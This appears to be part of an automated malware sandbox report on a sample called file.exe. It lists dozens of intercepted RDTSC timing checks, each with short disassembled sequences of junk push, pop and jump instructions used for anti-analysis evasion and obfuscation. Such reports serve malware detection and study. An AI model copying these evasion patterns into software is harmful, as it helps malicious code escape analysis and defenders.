                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C005 second address: 83C06A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F51CD041E09h 0x0000000e jmp 00007F51CD041E09h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F51CD041DFFh 0x0000001a jmp 00007F51CD041E09h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C476 second address: 83C488 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C488 second address: 83C4A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F51CD041E02h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C4A1 second address: 83C4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C58Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C4BC second address: 83C4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C612 second address: 83C631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C631 second address: 83C637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C637 second address: 83C63D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C63D second address: 83C677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E08h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F51CD041E07h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C677 second address: 83C67D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C67D second address: 83C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C687 second address: 83C68F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C68F second address: 83C69B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F51CD041DF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83C69B second address: 83C69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EC2D second address: 83EC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EC31 second address: 83EC35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EC35 second address: 83EC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F51CD041DFEh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007F51CD041DF6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EC49 second address: 83EC60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C592h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 83EC60 second address: 83EC66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84206A second address: 842098 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C596h 0x00000007 push ebx 0x00000008 jng 00007F51CCC6C586h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jbe 00007F51CCC6C588h 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 842098 second address: 84209E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 84209E second address: 8420A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841C27 second address: 841C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841C2D second address: 841C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 841C31 second address: 841C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841C37 second address: 841C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D8A second address: 841D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F51CD041DF6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D99 second address: 841D9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 841D9D second address: 841DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F51CD041DF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845774 second address: 845778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845778 second address: 84579B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E04h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84579B second address: 84579F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84579F second address: 8457A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8457A5 second address: 8457AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8457AA second address: 8457B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8458F5 second address: 845908 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F51CCC6C58Eh 0x00000008 je 00007F51CCC6C586h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 845908 second address: 84590E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 849FB0 second address: 849FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F51CCC6C586h 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A134 second address: 84A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041E03h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A14F second address: 84A172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F51CCC6C597h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A2BF second address: 84A2CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F51CD041DF8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A400 second address: 84A408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A408 second address: 84A40D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A40D second address: 84A429 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C598h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A429 second address: 84A43B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F51CD041DFCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A43B second address: 84A463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F51CCC6C598h 0x0000000d jc 00007F51CCC6C598h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A463 second address: 84A473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A473 second address: 84A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C596h 0x00000009 jmp 00007F51CCC6C593h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4A0 second address: 84A4A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4A4 second address: 84A4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A4B2 second address: 84A4B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2BFC second address: 7B2C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2C00 second address: 7B2C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2C0A second address: 7B2C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F51CCC6C586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F60A second address: 84F640 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E06h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F51CD041E06h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F640 second address: 84F65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C598h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84F65C second address: 84F660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84FA91 second address: 84FA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857017 second address: 85701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85731D second address: 85733F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CCC6C58Ch 0x0000000f jmp 00007F51CCC6C58Ch 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85733F second address: 857383 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E07h 0x00000007 jmp 00007F51CD041E09h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jo 00007F51CD041E08h 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F51CD041DF6h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857383 second address: 857387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C26 second address: 857C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F51CD041DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C34 second address: 857C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jnp 00007F51CCC6C586h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F51CCC6C58Ah 0x00000019 jp 00007F51CCC6C586h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C58 second address: 857C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C5C second address: 857C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C65 second address: 857C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C6D second address: 857C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 857C76 second address: 857C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8589FA second address: 858A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C593h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 858A13 second address: 858A17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85CBD9 second address: 85CBEB instructions: 0x00000000 rdtsc 0x00000002 js 00007F51CCC6C588h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F51CCC6C586h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85BD40 second address: 85BD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C8BA second address: 85C8BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85C8BF second address: 85C8C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 869703 second address: 86970D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F51CCC6C586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86970D second address: 869758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b ja 00007F51CD041DF6h 0x00000011 jmp 00007F51CD041E03h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F51CD041E04h 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 je 00007F51CD041DF6h 0x00000027 jc 00007F51CD041DF6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678DF second address: 8678E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678E3 second address: 8678ED instructions: 0x00000000 rdtsc 0x00000002 jg 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8678ED second address: 8678F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnc 00007F51CCC6C586h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867C57 second address: 867C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DCB second address: 867DCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DCF second address: 867DDA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867DDA second address: 867DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868203 second address: 868208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868208 second address: 868235 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F51CCC6C592h 0x0000000a popad 0x0000000b jng 00007F51CCC6C588h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jl 00007F51CCC6C586h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868235 second address: 86823B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86823B second address: 86824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CCC6C58Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86958A second address: 86958E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86958E second address: 86959B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867321 second address: 867355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CD041E00h 0x0000000a jmp 00007F51CD041E07h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F51CD041DF6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 867355 second address: 86735F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F51CCC6C586h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870631 second address: 870656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFBh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F51CD041DFCh 0x00000010 jnc 00007F51CD041DF6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 870656 second address: 870661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872DF5 second address: 872DFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878D4A second address: 878D79 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F51CCC6C58Ch 0x0000000d jmp 00007F51CCC6C595h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 878D79 second address: 878D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88413F second address: 884159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F51CCC6C593h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884159 second address: 88415F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88415F second address: 884181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CCC6C592h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F51CCC6C588h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884181 second address: 884191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F51CD041DF6h 0x0000000a jnl 00007F51CD041DF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884191 second address: 884195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
